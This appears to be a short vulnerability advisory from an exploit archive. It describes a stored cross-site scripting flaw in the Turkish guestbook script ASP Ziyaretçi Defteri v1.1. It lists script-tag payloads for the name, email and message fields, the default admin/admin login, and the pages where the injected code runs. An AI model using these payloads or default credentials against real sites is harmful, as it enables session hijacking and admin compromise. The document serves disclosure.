ASP Ziyareti Defteri version 1.1 suffers from a cross site scripting vulnerability.
b6c20341b28d1155e74b73dd9dcb78326bf354b2615173ba9249608c3c6bece4ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability
#Software: ASP Ziyaretçi Defteri v1.1 (tr)
#download: http://www.aspindir.com/goster/4882
#demo: http://www.hiddenchest.com/kodlarim/ziyaret/
#Found By: GeFORC3 ( G3 )
#Exploit:
1-http://www.example.com/ziyaret/mesaj_formu.asp
Isim: <script>alert("G3");</script>
E-posta: <script>alert("G3");</script>
Mesajiniz: <script>alert("G3");</script>
Press to "Gönder"(send) button.
2-
Yönetici paneli (admin panel):
http://www.example.com/ziyaret/default.asp (default user:admin pass:admin)
press "gir" button.
http://www.example.com/default.asp?islem=login --> running xss code
This xss works on ASP Ziyaretçi Defteri v1.1 (tr) script's Yönetici Paneli
(admin panel)
if eðer admin mesajý onaylarsa (active ederse) xss code çalýþýr guestbook's
main page (ziyaretçi defterinin ana sayfasýnda)
if admin checked your message (xss code)
xss code running ASP Ziyaretçi Defteri v1.1's (guestbook's) main page (
http://example.com/ziyaret/ziyaretci_mesajlari.asp)
WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed